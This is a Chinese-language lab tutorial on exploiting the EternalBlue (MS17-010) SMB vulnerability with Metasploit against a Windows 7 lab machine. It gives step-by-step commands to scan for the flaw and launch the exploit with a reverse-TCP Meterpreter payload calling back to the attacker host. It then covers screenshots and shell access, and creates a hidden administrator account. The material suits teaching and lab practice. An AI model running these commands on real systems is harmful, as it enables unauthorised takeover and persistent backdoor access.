永恒之蓝是一种利用windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。
什么是SMB协议?
SMB(全称是Server Message
Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
实验环境
攻击机(kali):192.168.109.131
靶机 (win7):192.168.109.128
实验步骤
1.测试两台主机之间的连通性:用kali去ping windows7
2.开启kali主机数据库:service postgresql
初始化msf数据库:msfdb init
开启msf:msfconsole
3.查看数据库连接状态:db_ststus
4.搜索ms17_010:search ms17_010
5.使用辅助模块的扫描命令:use auxiliary/scanner/smb/smb_ms17_010
6.查看模块所需设置的内容:options
RHOSTS :目标主机地址
RPORT :目标主机开放的端口,为445端口
THRENADS:线程,默认为1
7.扫描目标主机是否开放445端口:
8.设置目标主机地址:set rhosts 192.168.109.128
发现漏洞,很大可能可以利用.
9.进入攻击模块:use exploit/windows/smb/ms17_010_eternalblue
设置目标主机地址:set rhosts 192.168.109.128
10.设置payload: set payload windows/x64/meterpreter/reverse_tcp
最后在设置一下攻击机的地址:set lhost 192.168.109.131
攻击:exploit
攻击成功!
持续攻击
1.显示远程主机系统信息:sysinfo
2.查看用户身份:getuid
3.对远程主机当前屏幕进行截图:screenshot
截屏后,图片会显示在kali桌面
4.获取shell控制台:shell
5.创建管理员用户:net user stray 123456 /add
将stray加入到win7的本地管理员组中,获取更大权限:
net localgroup administrators stray /add
查看本机用户:net user
stray已经被添加到win7中!!!